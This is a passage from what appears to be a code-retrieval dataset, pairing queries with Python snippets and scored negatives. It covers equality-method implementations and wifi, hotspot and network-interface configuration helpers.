test_equal_on_equal(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n self.assertTrue(a == b)\n self.assertTrue(b == a)", "def __ne__(self, other):\n return not(self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not self == other", "def test_equal_on_type_mismatch(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = \"invalid\"\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def __ne__(self, other):\r\n return not (self == other)", "def test_not_equal_same_reference():\n v = Vector(1.0)\n assert_false(v != v)", "def test_unequality(self):\n self.assertFalse(Record(1, 2) != Record(1, 2))\n self.assertTrue(Record(1, 2) != Record(1, 3))\n self.assertTrue(Record(1, 2) != Record(2, 2))\n self.assertTrue(Record(1, 2) != Record(3, 4))", "def __ne__(self, other):\n return not self == other", "def __ne__(self, other):\n return not self == 
other", "def test_eq(self):\n dummy = DummyCryptographicObject()\n self.assertTrue(dummy == dummy)", "def __ne__(self, other):\n return not_equal(self, other)", "def test_not_equal(self):\n p1 = make_package(filename=\"foobar\")\n p2 = make_package(filename=\"foo\")\n self.assertNotEqual(hash(p1), hash(p2))\n self.assertNotEqual(p1, p2)", "def test_equal_on_equal_and_empty(self):\n a = Digest()\n b = Digest()\n\n self.assertTrue(a == b)\n self.assertTrue(b == a)", "def __ne__(self, other):\n pass", "def __ne__(self, other):\r\n return not self == other", "def __ne__(self, other):\r\n return not self == other", "def __ne__(self, other):\n if not isinstance(other, StorageEnclosureAllOf):\n return True\n\n return self.to_dict() != other.to_dict()", "def __ne__(self, other):\r\n return not self.__eq__(other)", "def __ne__(self, other):\r\n return not self.__eq__(other)", "def __ne__(self, other):\r\n return not self.__eq__(other)", "def __ne__(self, other):\r\n return not self.__eq__(other)", "def __ne__(self,other):\n return not self == other", "def test_eq_false_id(self):\n other = Sample('1.SKD8.640184', self.sample_template)\n self.assertFalse(self.tester == other)", "def test_differentClassesInequality(self):\n self.assertTrue(Record(1, 2) != DifferentRecord(1, 2))", "def __ne__(self, other):\n if not isinstance(other, ComputingCore):\n return True\n\n return self.to_dict() != other.to_dict()", "def __ne__(self, oth):\n return int(self) == oth", "def test_almost_equal(self):\n x = Point(\n lat=23.4,\n lng=23.1,\n author=self.u\n )\n self.assertTrue(self.a == x)\n self.assertFalse(self.a != x)", "def __ne__(self, other):\n return super().__eq__(other)", "def __ne__(self, other):\n if not isinstance(other, V1beta1ObjectiveSpec):\n return True\n\n return self.to_dict() != other.to_dict()", "def __ne__(self, other):\n if not isinstance(other, GraphicField):\n return True\n\n return self.to_dict() != other.to_dict()", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n return not self.__eq__(other)", "def __ne__(self, other):\n # type: (object) -> bool\n return not self == other", "def __ne__(self, other):\n # type: (object) -> bool\n return not self == other", "def __ne__(self, other):\n # type: (object) -> bool\n return not self == other", "def __ne__(self, other):\n return not 
(self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)", "def __ne__(self, other):\n return not (self == other)" ]
[ "0.74571276", "0.73648274", "0.73306084", "0.72958326", "0.7260039", "0.72194594", "0.7127766", "0.70569617", "0.7055979", "0.7028425", "0.70240885", "0.7012719", "0.6914279", "0.68538886", "0.68433744", "0.6823976", "0.6806015", "0.6802378", "0.6794009", "0.675546", "0.6751178", "0.6749799", "0.6749393", "0.67392707", "0.6717619", "0.6699802", "0.6687567", "0.66858983", "0.66744435", "0.66558033", "0.66283274", "0.66117424", "0.6604382", "0.6600236", "0.65757626", "0.6569656", "0.65640706", "0.65627897", "0.65549684", "0.65549684", "0.65549684", "0.6532829", "0.6518747", "0.65075916", "0.6503658", "0.65000325", "0.64988124", "0.64988124", "0.6497821", "0.6495444", "0.64896613", "0.6473168", "0.64719963", "0.6467854", "0.6467854", "0.6466305", "0.6466204", "0.6466204", "0.6466204", "0.6466204", "0.6456128", "0.64447016", "0.6443302", "0.6425077", "0.64174575", "0.64169556", "0.64121", "0.6389829", "0.6386101", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6385508", "0.6378944", "0.6378944", "0.6378944", "0.63787395", "0.63787395", "0.63787395", "0.63787395", "0.63787395", "0.63787395", "0.63787395" ]
0.0
-1
Decide whether to enter hotspot mode or wifi mode and then do so
def set_wifi_mode(args): pass """+ try: if args['mode'] == 'hotspot': logger.info('will enter hotspot mode') #TODO - Need to capture the line that contains interface [some lan id] and uncomment it. change_file_line(path.join('/etc', 'dhcpcd.conf'), interface_l1_res, 'interface {}\n'.format() return True if args['silent'] else 'Ok' if args['mode'] == 'wi-fi': logger.info('will enter wi-fi mode') return True if args['silent'] else 'Ok' else: logger.error('Unknown wi-fi mode: {}'.format(args['mode'])) return False if args['silent'] else 'ERROR' except: logger.error('Exception in set_wifi_mode: {}, {}'.format(exc_info()[0], exc_info()[1])) return False if args['silent'] else 'ERROR' """
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _cycle_wifi(mode=None):\n call(['ifdown', settings.WIFI_INTERFACE])\n if mode is not None:\n call(['iwconfig', settings.WIFI_INTERFACE, 'mode', mode])\n call(['ifup', settings.WIFI_INTERFACE])", "def switch_network(self,type = None):\n network_type = self.appconfig(type,\"Settings\")\n self.logger.debug(\"Switch network to %s:%s.\" % (type,network_type))\n if self.enter_settings(u\"More…\"):\n if self.device(text=\"Mobile networks\").exists:\n self.device(text=\"Mobile networks\").click()\n if self.device(text=\"Preferred network mode\").wait.exists(timeout=self.timeout):\n self.device(text=\"Preferred network mode\").click()\n if self.device(resourceId=\"android:id/buttonPanel\").wait.exists(timeout=self.timeout):\n self.device(text=network_type).click()\n print self._is_connected(type)\n self.back_to_home()", "def system(self, mode=None):\n if mode == System.AUTO:\n self.change_request[\"SystemSwitch\"] = System.AUTO\n elif mode == System.COOL:\n self.change_request[\"SystemSwitch\"] = System.COOL\n elif mode == System.HEAT:\n self.change_request[\"SystemSwitch\"] = System.HEAT\n elif mode == System.OFF:\n self.change_request[\"SystemSwitch\"] = System.OFF\n else:\n return False\n return self.change_request[\"SystemSwitch\"]", "def wifi_on(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE01\")\n time.sleep(100e-3)", "def _setup_wifi_ap(self):\n context = self._get_ap_context()\n try:\n check_output(['ifconfig', context['hostname']])\n logger.info('wifi ap {} already setup'.format(context['hostname']))\n return True\n except CalledProcessError:\n logger.info('Setting up virtual access point interface')\n call(['service', 'hostapd', 'stop'])\n call(['service', 'dnsmasq', 'stop'])\n\n self._write_system_template('/etc/dnsmasq.conf', 'access_point/dnsmasq.conf')\n self._write_system_template('/etc/hostapd/hostapd.conf', 'access_point/hostapd.conf', context)\n self._write_system_template('/etc/network/interfaces', 'access_point/interfaces.conf', context)\n self._write_system_template('/etc/default/hostapd', 'access_point/default_hostapd.conf', context)\n self._write_system_template('/etc/dhcpcd.conf', 'access_point/dhcpcd.conf', context)\n \n call(['systemctl', 'enable', 'hostapd', ])\n call(['systemctl', 'enable', 'dnsmasq', ])\n return True", "def turn_on(self, **kwargs):\n self._state = True\n if(self._device['type'] == '_DT-PLUG' or self._device['type'] == '_THIMR'):\n self._send_cmd(self._device,'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"op\":1 }', 5)\n if(self._device['type'] == '_REALY2' or self._device['type'] == '_REALY4'):\n self._send_cmd(self._device, 'cmd=ctrl&devices={[' + self._device[\"sid\"] + ']}&op={\"cmd\":5,\"'+ self._data_key +'\":1 }', 5)", "def set_monitor_mode(controller_name):\n subprocess.run([\"ip\", \"link\", \"set\", wifi_name, \"down\"])\n subprocess.run([\"airmon-ng\", \"check\", \"kill\"])\n subprocess.run([\"iw\", wifi_name, \"set\", \"monitor\", \"none\"])\n subprocess.run([\"ip\", \"link\", \"set\", wifi_name, \"up\"])", "def connect_type(word_list):\n if 'wlan0' in word_list or 'wlan1' in word_list:\n con_type = 'wifi'\n elif 'eth0' in word_list:\n con_type = 'ethernet'\n else:\n con_type = 'current'\n\n return con_type", "def modes(self, mode):\n # Sends the update to the piston worker\n self.worker_piston.mode = mode\n if mode == 1: # 'VCV'\n self.VCV_start_btn.setEnabled(False)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 2: # 'PCV'\n 
self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(False)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(True)\n elif mode == 3: # 'PSV'\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(False)\n self.stop_btn.setEnabled(True)\n elif mode == 4: # 'Emergency'\n print('Emergency')\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)\n else: # STOP\n self.VCV_start_btn.setEnabled(True)\n self.PCV_start_btn.setEnabled(True)\n self.PSV_start_btn.setEnabled(True)\n self.stop_btn.setEnabled(False)", "def test_wifi_scanner_with_wifi_off(self):\n self.log.debug(\"Make sure wifi is off.\")\n wutils.wifi_toggle_state(self.dut, False)\n self.start_wifi_scanner_single_scan_expect_failure(\n self.default_scan_setting)\n self.log.debug(\"Turning wifi back on.\")\n wutils.wifi_toggle_state(self.dut, True)", "def createWIFIAccessPoint():\n ifname = config.get(\"interface\", \"wifi\")\n ipaddress = config.get(\"hotspot\", \"ip\")\n prefix = int(config.get(\"hotspot\", \"prefix\"))\n ssid = config.get(\"hotspot\", \"ssid\")\n password = config.get(\"hotspot\", \"password\")\n ################################\n s_wifi = dbus.Dictionary(\n {\n \"ssid\": dbus.ByteArray(ssid.encode(\"utf-8\")),\n \"mode\": \"ap\",\n })\n s_wsec = dbus.Dictionary(\n {\n \"key-mgmt\": \"wpa-psk\",\n \"psk\": password\n })\n s_con = dbus.Dictionary(\n {\"type\": \"802-11-wireless\",\n \"interface-name\":ifname ,\n \"uuid\": str(uuid.uuid4()),\n \"id\": ssid,\n \"autoconnect\":dbus.Boolean(True)\n })\n addr1 = dbus.Dictionary({\"address\": ipaddress, \"prefix\": dbus.UInt32(prefix)})\n dns = []\n s_ip4 = dbus.Dictionary(\n {\n \"address-data\": dbus.Array([addr1], signature=dbus.Signature(\"a{sv}\")),\n \"dns\": dbus.Array(dns, signature=dbus.Signature('u'), variant_level=1),\n \"method\": \"manual\",\n })\n s_ip6 = dbus.Dictionary({\"method\": \"ignore\"})\n con = dbus.Dictionary(\n {\n \"802-11-wireless\": s_wifi,\n \"802-11-wireless-security\":s_wsec,\n \"connection\": s_con,\n \"ipv4\": s_ip4,\n \"ipv6\": s_ip6\n })\n try:\n logging.info(\"Creating hotspot connection: {} - {}\".format(s_con[\"id\"], s_con[\"uuid\"]))\n ##########\n bus = dbus.SystemBus()\n proxy = bus.get_object(\n \"org.freedesktop.NetworkManager\", \"/org/freedesktop/NetworkManager/Settings\"\n )\n settings = dbus.Interface(proxy, \"org.freedesktop.NetworkManager.Settings\")\n connection = settings.AddConnection(con)\n logging.info(f\"Created access point connection {connection}\")\n except Exception as e:\n logging.error(\"Hotspot connection creation failed\")\n logging.error(e)", "def set_airplane_mode(self, action):\n\n is_action_performed = False\n is_airplane_mode_on_off_visible = False\n\n settings_more_button = \\\n 'self.android_locators.SETTINGS_MORE_BUTTON_ByXPATH'\n airplane_mode_on_off_toggle = \\\n 'self.android_locators.AIRPLANE_MODE_ON_OFF_ByID'\n\n if self.phone_info.phone_type == PhoneType.IOS:\n airplane_mode_on_off_toggle = \\\n 'self.ios_locators.AIRPLANE_MODE_ON_OFF_ByXPATH'\n no_sim_card_installed_msg = \\\n 'self.ios_locators.NO_SIM_CARD_INSTALLED_ByXPATH'\n no_sim_card_installed_ok_button = \\\n 'self.ios_locators.NO_SIM_CARD_INSTALLED_OK_BUTTON_ByXPATH'\n\n try:\n try:\n # verify that Airplane Mode Button is visible\n is_airplane_mode_on_off_visible = self.find_element(\n self.driver.appium_driver,\n airplane_mode_on_off_toggle, 0).is_displayed()\n 
except:\n logger.debug(\n \"Airplane Mode ON/OFF button is currently not visible\")\n\n if self.phone_info.phone_type == PhoneType.ANDROID:\n if not is_airplane_mode_on_off_visible:\n self.driver.appium_driver.close_app()\n self.driver.appium_driver.launch_app()\n time.sleep(1)\n self.wait_till_element_to_be_visible(\n self.driver.appium_driver, settings_more_button, 5)\n self.find_element(self.driver.appium_driver,\n settings_more_button, 1).click()\n # self.wait_till_element_to_be_visible(\n # self.driver.appium_driver, airplane_mode_on_off_toggle)\n logger.debug(\n \"Click on more button to make Airplane Mode visible\")\n\n airplane_mode_toggle_status = self.find_element(\n self.driver.appium_driver,\n airplane_mode_on_off_toggle).text\n if airplane_mode_toggle_status.upper() == action.upper():\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n else:\n self.find_element(self.driver.appium_driver,\n airplane_mode_on_off_toggle, 0).click()\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n self.driver.appium_driver.back()\n\n elif self.phone_info.phone_type == PhoneType.IOS:\n if not is_airplane_mode_on_off_visible:\n self.driver.appium_driver.close_app()\n self.driver.appium_driver.launch_app()\n time.sleep(1)\n airplane_mode_toggle_status = self.find_element(\n self.driver.appium_driver, airplane_mode_on_off_toggle,\n 0).text\n\n if action.upper() == \"ON\":\n if (airplane_mode_toggle_status == False) or \\\n (airplane_mode_toggle_status == '1'):\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n try:\n self.wait_till_element_to_be_visible(\n self.driver.appium_driver,\n 'self.ios_locators.OK_BUTTON_AFTER_BLUETOOTH_OFF_ByID',\n 3)\n self.find_element(self.driver.appium_driver,\n 'self.ios_locators.OK_BUTTON_AFTER_BLUETOOTH_OFF_ByID',\n 0).click()\n except:\n pass\n\n else:\n self.find_element(self.driver.appium_driver,\n airplane_mode_on_off_toggle,\n 0).click()\n try:\n self.wait_till_element_to_be_visible(\n self.driver.appium_driver,\n 'self.ios_locators.OK_BUTTON_AFTER_BLUETOOTH_OFF_ByID',\n 3)\n self.find_element(self.driver.appium_driver,\n 'self.ios_locators.OK_BUTTON_AFTER_BLUETOOTH_OFF_ByID',\n 0).click()\n except:\n pass\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n elif action.upper() == \"OFF\":\n if (airplane_mode_toggle_status == True) or \\\n (airplane_mode_toggle_status == '0'):\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n else:\n self.find_element(self.driver.appium_driver,\n airplane_mode_on_off_toggle,\n 0).click()\n time.sleep(1)\n\n is_action_performed = True\n logger.debug(\n \"Airplane Mode button set as {}\".format(action))\n else:\n logger.debug(\n \"Only ON/OFF operation is possible with Airplane \"\n \"Mode. 
{} option is not permitted\".format(\n action))\n\n except Exception as e:\n logger.error(\n \"Exception occured while performing Airplane mode {} \".format(\n action))\n logger.error(repr(e))\n\n return is_action_performed", "def wifi_connect(self, vap: VirtualAPHostapd) -> bool:\n config_file_name = \"boardfarm_tmp.conf\"\n config_file_path = \"/tmp/{}\".format(config_file_name)\n\n # Create network configuration for SSID\n bssid = \"bssid={}\".format(vap.bssid)\n ssid = \"ssid=\\\"{}\\\"\".format(vap.get_ssid())\n key = \"psk=\\\"{}\\\"\".format(vap.get_psk())\n network_config = \"network={{\\n{}\\n{}\\n{}\\n}}\".format(bssid, ssid, key)\n # Clean up previous configuration\n self.sendline(\"rm -f \\\"{}\\\"\".format(config_file_path))\n self.expect(self.prompt)\n self.sendline(\"echo \\'{}\\' > \\\"{}\\\"\".format(network_config, config_file_path))\n self.expect(self.prompt)\n # Start wpa_supplicant with created configuration\n # Typical coommand on RPI: wpa_supplicant -B -c/tmp/temp.conf -iwlan0 -Dnl80211,wext\n self.sudo_sendline(\"wpa_supplicant -B -D{} -i{} -c{}\".format(\n self.driver_name, self.iface_wifi, config_file_path))\n self.expect(\"Successfully initialized wpa_supplicant\")\n return bool(self.match)", "def _select_mode(self):\n self.__check_mode()\n if self.mode[\"auto_mode\"]:\n self.mode_auto()\n elif self.mode[\"auto_mode\"] is None: # Do Nothing\n self.mode_standby()\n else:\n self.mode_manual()", "def is_on(self) -> bool:\n return self.tuya_device.status.get(DPCODE_SWITCH, False)", "def set_mode(vehicle, mode):\n util.log_info(\"Setting %s.\" % mode)\n shared.status['manual_mode'] = mode\n vehicle.mode = VehicleMode(mode)\n \n wait_count = 0 \n while True:\n time.sleep(.2)\n wait_count = wait_count + 1\n \n if vehicle.mode.name == mode :\n return True\n \n elif wait_count >= 45:\n util.log_warning(\"Unable to set %s. 
Assume link lost.\" % mode)\n shared.status['abort'] = True\n return False\n \n elif wait_count % 15 == 0 :\n util.log_warning(\"Retry setting %s\" % mode)\n vehicle.mode = VehicleMode(mode) # resend command", "def setup():\n print('Setup option is not working')\n quit()\n print('Long press the reset button until the blue Led is blinking quickly')\n print('Long press again until blinking slowly')\n print('Manually connect this device to the Wifi SSID named BlroadlinkProv')\n print('Press security mode (0 = none, 1 = WEP, 2 = WPA1, 3 = WPA2, 4 = WPA1/2)')\n print('Default:3')\n\n security = raw_input('Security mode:').lower()\n\n if security == 'none':\n security = 0\n elif security == 'wep':\n security = 1\n elif security == 'wpa1':\n security = 2\n elif (security == 'wpa2') or (security == ''):\n security = 3\n elif security == 'wpa1/2':\n security = 4\n security = int(security)\n if not(0 <= security <= 4):\n raise IndexError\n\n ssid = raw_input('SSID of your router :')\n if security != 0:\n password = raw_input('Password:')\n else:\n password = ''\n broadlink.setup(ssid, password, security)", "def connect(self):\n self.sta_if = network.WLAN(network.STA_IF)\n self.sta_if.active(False)\n sleep(1)\n self.sta_if.active(True)\n\n dbg(\"Interface active\")\n if self.check_ap(self.ssid):\n # connect to access point\n if not self.sta_if.isconnected():\n dbg('connecting to AP...')\n self.sta_if.active(True)\n self.sta_if.connect(self.ssid, self.key)\n while not self.sta_if.isconnected():\n machine.idle()\n # Do we need a timeout here?\n dbg(self.sta_if.ifconfig())\n else:\n dbg(\"WLAN already connected\")\n dbg(self.sta_if.ifconfig())\n else:\n dbg(\"Target SSID not found.\")\n reset(\"Could not connect to network - target SSID is not availble.\", HARD)", "def set_into_managed_mode(wifi_name):\n \n subprocess.run([\"ip\", \"link\", \"set\", wifi_name, \"down\"])\n subprocess.run([\"iwconfig\", wifi_name, \"mode\", \"managed\"])\n subprocess.run([\"ip\", \"link\", \"set\", wifi_name, \"up\"])\n subprocess.run([\"service\", \"NetworkManager\", \"start\"])", "def check_mode(self):\n if self.proximity.check_press():\n self.cycle_mode()\n return self.mode", "def joinwifi():\n station = network.WLAN(network.STA_IF) # initiate a station mode\n\n if not station.isconnected():\n print('connecting to network:', ssid())\n station.active(True)\n station.connect(ssid(), password())\n \n\n while not station.isconnected():\n pass\n\n # deactivating access point mode\n ap = network.WLAN(network.AP_IF)\n ap.active(False)\n\n ip = station.ifconfig()[0]\n print('connected as:', ip)\n\n return ip", "def init_wlan_sta():\n\n print('WLAN: STA mode')\n wlan.init(mode=WLAN.STA)\n if not wlan.isconnected():\n wlan.connect(WLAN_SSID, auth=WLAN_AUTH, timeout=5000)\n while not wlan.isconnected():\n machine.idle() # save power while waiting", "def __check_mode(self):\n self.mode[\"auto_mode\"] = self.communications.get_mode()", "def _force_on(self):\n self._interface.set('fw_wp_vref', self._fw_wp_vref)\n self._interface.set('fw_wp_en', 'on')\n self._interface.set('fw_wp', 'on')", "def __auto_mode(self):\n while True:\n # establish connection\n while True:\n if self.android_api.is_connect():\n break\n self.android_api.init_bluetooth()\n time.sleep(0.05)\n\n\n if self.android_api.is_map_empty():\n if self.production:\n # self.print_msg(\"Waiting for map update\")\n time.sleep(0.05)\n continue\n else:\n self.__test_run_pipeline_style()\n else:\n self.print_msg(\"Updating map\")\n self.android_api.map_pop_n_exe()\n 
time.sleep(0.05)", "def check_enable_mode(self, *args, **kwargs):\n pass", "def checkWifi():\n try:\n subprocess.check_output(\"iwgetid\")\n return True\n except subprocess.CalledProcessError: # if not connected\n return False", "def do_internet(self, args):\n\n device = \\\n self._get_choice_(\"ahd\", self.ahds(), \"For which account holder device?\")\n device.toggle_internet()\n print(\"Device is now {}.\\n\".format([\"offline\", \"online\"][device.internet_connection]))", "def connect():\n \n print(\"*****Starting connection*****\")\n \n ssid = id_key.network_id #hidden ssid\n key = id_key.network_key #hidden key\n \n station = network.WLAN(network.STA_IF)\n \n if station.isconnected() == True:\n print(\"*****Already connected*****\")\n return\n \n station.active(True)\n station.connect(ssid, key)\n \n while station.isconnected() == False:\n pass\n \n print(\"*****Connection successful*****\")\n print(station.ifconfig())", "def turn_on(self, **kwargs: Any) -> None:\n if self.type == \"on_off\":\n _LOGGING.debug(\"Starting all torrents\")\n self._tm_client.api.start_torrents()\n elif self.type == \"turtle_mode\":\n _LOGGING.debug(\"Turning Turtle Mode of Transmission on\")\n self._tm_client.api.set_alt_speed_enabled(True)\n self._tm_client.api.update()", "def DualMode(self) -> bool:", "async def async_set_wifi_led_on(self):\n return", "def host_maintenance_mode(self, host, mode):\n if not mode:\n return 'off_maintenance'\n return 'on_maintenance'", "def host_maintenance_mode(self, host, mode):\n if not mode:\n return 'off_maintenance'\n return 'on_maintenance'", "def force_switch_on(self):\n self.turn_on_modem()", "def set_mode(self, mode):\n if mode == 'train':\n self.net.train()\n elif mode == 'eval':\n self.net.eval()\n else:\n raise ValueError(\n \"Got invalid mode '{}'. 
Valid options are 'train' and 'eval'.\".format(mode))", "def set_current_operation_mode(self, operation_mode):\n self._current_operation_mode = operation_mode\n \"\"\"Retrieve from textual representation\"\"\"\n if self._current_operation_mode == 'Off':\n self._api._opmode = 0;\n elif self._current_operation_mode == 'Heat only':\n self._api._opmode = 1;\n elif self._current_operation_mode == 'Cool only':\n self._api._opmode = 2;\n elif self._current_operation_mode == 'Heat & Cool':\n self._api._opmode = 3; \n self._api.set()\n self.schedule_update_ha_state()", "def on(config: dict):\n switch_device(config, config[\"inching\"], \"on\")", "def wifi_off(self):\n self._clear_read_buffer()\n self._write_cmd(\"PE00\")\n time.sleep(100e-3)", "def wifi_callback(self, msg):\n self.wifi_strength = msg.signal_strength\n\n\tif self.odom != None:\n # if the turtlebot is in the wifi target range, then stop\n if abs(self.wifi_strength - self.target_strength) < 1.0:\n self.is_moving = False\n\n\t r = rospy.Rate(2)\n\t cmd_msg = Twist()\n\t cmd_msg.linear.x = NO_SPEED\n\t cmd_msg.angular.z = NO_SPEED\n\t self.cmd_pub.publish(cmd_msg)\n\n\t r.sleep()\n\n # otherwise, check what the new state should be according to the new reading\n else:\n\t self.state.odom_check(self.odom)\n\t self.state.scan_check(self.is_obstacle)\n self.target_odom = self.state.wifi_check(self.wifi_strength, self.prev_strength)\n\n self.prev_strength = self.wifi_strength", "def check_fw_mode(self, cat_cpuinfo_out):\n for line in cat_cpuinfo_out.splitlines():\n if \"firmware\" in line:\n if \"OPAL\" in line:\n return True\n else:\n return False\n return False", "def isDefaultMode():\n\treturn 0", "def mode_remote(self):\n self.send(\"!MR\")\n # time.sleep(2.0)\n # No feedback, so query to verify set\n got = self.get_mode()\n assert got == \"R\", got", "def setInfraParameters(self, sta, mode, distance):\n station.mode(str(sta), mode)\n \n seconds = 3\n self.src = str(sta)\n try:\n \"\"\"Based on RandomPropagationDelayModel (ns3)\"\"\"\n seconds = abs(mobility.speed[self.src])\n except:\n pass\n self.host = sta\n latency = wifiParameters.latency(distance)\n loss = wifiParameters.loss(distance)\n delay = wifiParameters.delay(distance, seconds)\n bw = wifiParameters.bw(distance, mode) \n self.host.pexec(\"tc qdisc replace dev %s-wlan0 root netem rate %.2fmbit loss %.1f%% latency %.2fms delay %.2fms\" % (sta, bw, loss, latency, delay)) \n #os.system('util/m %s tc qdisc replace dev %s-wlan0 root netem rate %.2fmbit latency %.2fms delay %.2fms' % (self.host, self.host, bandwidth, latency, delay))\n #self.host.cmd(\"tc qdisc replace dev %s-wlan0 root tbf rate %.2fmbit latency %.2fms burst 15k\" % (self.host, rate, latency)) \n associate = self.doAssociation(mode, distance)\n if associate == False:\n mobility.handover(self.host)", "def __getMode( self ):\n\n res = self.rssConfig.getConfigState()\n\n if res == 'Active':\n\n if self.rssClient is None:\n self.rssClient = ResourceStatusClient()\n return True\n\n self.rssClient = None\n return False", "def __remote_control_mode(self):\n while True:\n while True:\n if self.android_api.is_connect():\n break\n self.android_api.init_bluetooth()\n time.sleep(0.05)\n\n self.android_api.read_for_remote_control()\n time.sleep(0.05)", "def is_on(self):\n if self._switch_type == \"record_motion\":\n return self._camera_data[\"recording_mode\"] == TYPE_RECORD_MOTION\n elif self._switch_type == \"record_always\":\n return self._camera_data[\"recording_mode\"] == TYPE_RECORD_ALWAYS\n elif self._switch_type == 
\"record_smart\":\n return self._camera_data[\"recording_mode\"] == TYPE_RECORD_SMARTDETECT\n elif self._switch_type == \"ir_mode\":\n return self._camera_data[\"ir_mode\"] == self._ir_on_cmd\n elif self._switch_type == \"hdr_mode\":\n return self._camera_data[\"hdr_mode\"] is True\n elif self._switch_type == \"high_fps\":\n return self._camera_data[\"video_mode\"] == TYPE_HIGH_FPS_ON\n else:\n return self._camera_data[\"status_light\"] == \"True\"", "def turn_on(self, **kwargs) -> None:\n _LOGGER.debug(\n \"SynoDSMSurveillanceHomeModeToggle.turn_on(%s)\",\n self._api.information.serial,\n )\n self._api.surveillance_station.set_home_mode(True)", "def _disable_wifi_ap(self):\n call(['systemctl', 'disable', 'hostapd', ])\n call(['systemctl', 'disable', 'dnsmasq', ])\n\n context = self._get_ap_context()\n self._write_system_template('/etc/network/interfaces', 'interfaces.conf', context)\n self._write_system_template('/etc/dhcpcd.conf', 'dhcpcd.conf', context)", "def verify_ap_connection_mode(self, ap_mac, discovery_method = \"\"):\n ap_obj = self.mac_to_ap[ap_mac]\n\n logging.info(\"Get apmgrinfo of the AP %s\" % ap_mac)\n start_time = time.time()\n while True:\n apmgrinfo = ap_obj.get_ap_mgr_info()\n apmgrinfo = self._map_apmgrinfo_keys(apmgrinfo)\n\n if apmgrinfo and apmgrinfo[\"State\"] == \"RUN\":\n break\n\n time.sleep(2)\n if time.time() - start_time > 120:\n raise Exception(\"AP '%s' was not in RUN state\" % ap_mac)\n\n logging.debug(\"Obtained info: %s\" % apmgrinfo)\n\n logging.info(\"Get detailed information in ZD's webui about the AP %s\" % ap_mac)\n ap_info = APS.get_ap_detail_info_by_mac_addr(self.zd, ap_mac)\n logging.debug(\"Obtained infor: %s\" % ap_info)\n\n # Verify if the connection mode shown on AP's CLI and ZD are the same and correct\n conn_mode_in_zd = ap_info['tunnel_mode'].lower()\n # Use only first two characters (L2 or L3)\n conn_mode_in_zd = conn_mode_in_zd[:2]\n\n conn_mode_in_ap = apmgrinfo['Tunnel/Sec Mode'].split(\"/\")[0].strip().lower()\n conn_mode_in_ap = conn_mode_in_ap[:2]\n\n if conn_mode_in_ap != conn_mode_in_zd:\n msg = \"The connection mode shown on AP's CLI was '%s'\" % conn_mode_in_ap\n msg += \", which was different from the mode shown on ZD's webui '%s'\" % \\\n conn_mode_in_zd\n return msg\n\n discovery_reason = {\"fixed-pri\": \"Preferred Primary\",\n \"fixed-sec\": \"Preferred Secondary\",\n \"dns\": \"DNS\", \"dhcp\": \"DHCP\",\n \"record\": \"Last ZoneDir Joined\", \"l2\": \"L2 Discovery\"}\n\n if discovery_method in [\"fixed-pri\", \"fixed-sec\", \"dns\", \"dhcp\"]:\n if conn_mode_in_ap != \"l3\":\n msg = (\"The connection mode was %s instead of L3 [AP %s] [dmode %s]\" %\n (conn_mode_in_ap.upper(), ap_mac, discovery_method))\n return msg\n\n if apmgrinfo['Discover Director By'] != discovery_reason[discovery_method]:\n msg = \"The discover method showed on AP's CLI was '%s'\" % \\\n apmgrinfo['Discover Director By']\n msg += \", it should have been '%s'\" % discovery_reason[discovery_method]\n return msg\n\n elif discovery_method == \"record\":\n if apmgrinfo['Discover Director By'] != discovery_reason[discovery_method]:\n msg = \"The discover method showed on AP's CLI was '%s'\" % 